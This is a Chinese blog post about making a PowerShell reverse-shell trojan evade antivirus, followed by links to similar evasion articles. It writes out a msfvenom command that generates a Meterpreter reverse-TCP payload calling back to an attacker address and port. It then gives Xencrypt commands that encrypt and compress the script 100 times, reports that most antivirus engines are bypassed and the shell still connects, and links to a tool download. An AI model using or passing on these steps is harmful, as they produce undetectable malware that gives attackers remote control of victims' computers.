powershell加密、压缩免杀实战

作者: 城市烈人 | 来源:发表于2020-03-26 16:53 被阅读0次

powershell加密、压缩免杀实战
免杀powershell 绕过杀软
杀毒与免杀技术详解之三：特征码免杀实战
Virbox Compiler -安全编译器——实现源代码编译过
Powershell免杀从入门到实践
浅谈meterpreter免杀
MSF--Powershell木马免杀测试过36*和火*
【Powershell 教程】学习资源汇总
cs之power shell免杀
木马免杀之源码免杀|断刀流技术博客

结合"PowerShell crypter"工具(下面用简称"crypter")来对powershell脚本进行加密并采用Gzip/DEFLATE来绕过杀软

1、msfvenom生成powershell 反弹马

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= 192.168.81.253 LPORT=5555 -f psh-reflection > hackshark.ps1

image.png

通过检测，发现依然有很多家杀软报毒

image.png

2、采用"crypter"加密、压缩处理ps反弹木马

在powershell终端中输入

Import-Module ./xencrypt.ps1

Invoke-Xencrypt -InFile .\hackshark.ps1 -OutFile hackhack.ps1 -Iterations 100

"-Iterations 100"是对脚本进行100次的加密与压缩

经过100加密、压缩后

image.png

已经实现大部分免杀了

image.png

也能成功反弹：

image.png

工具下载地址：
https://github.com/hackshark/Hack-Tools/blob/master/powershell%E5%85%8D%E6%9D%80%E5%B7%A5%E5%85%B7xencrypt-master.zip

powershell加密、压缩免杀实战
结合"PowerShell crypter"工具(下面用简称"crypter")来对powershell脚本进行加...
免杀powershell 绕过杀软
免杀powershell 绕过小白看了各种大佬做的免杀文章感觉太神奇了，于是自己也做了一个………….有点low，...
杀毒与免杀技术详解之三：特征码免杀实战
杀毒与免杀技术详解之三：特征码免杀实战杀毒与免杀技术详解之二：特征码定位-工具及原理
Virbox Compiler -安全编译器——实现源代码编译过
Virbox Compiler -跨平台编译器——实现源代码编译过程的加密。加密后程序不会报毒，可实现免杀。这是...
Powershell免杀从入门到实践
前言文章首发于Freebuf在之前发布的一篇渗透技巧之Powershell实战思路[https://www.f...
浅谈meterpreter免杀
前言最近玩了玩免杀，学习了很多免杀的技巧，免杀基本就那么几个套路，静态文件特征码免杀，内存特征码免杀，行为免杀，...
MSF--Powershell木马免杀测试过36*和火*
之前看了一篇对CS的Powershell木马进行Base64编码达到免杀效果，今天随便测试了一下MSF的Power...
【Powershell 教程】学习资源汇总
【Powershell 教程】学习资源汇总一、书籍教程 1、《Windows PowerShell实战指南》第3...
cs之power shell免杀
0x01 生成powershell脚本前几天看了Y4er大佬免杀思路文章，我按照他的思路扩展了下总结的方法给大家...
木马免杀之源码免杀|断刀流技术博客
源码免杀在业内也被称为“白盒免杀”，与通常的修改二进制代码的“黑盒免杀”想对应。随着免杀技术与反病毒技术的不断博...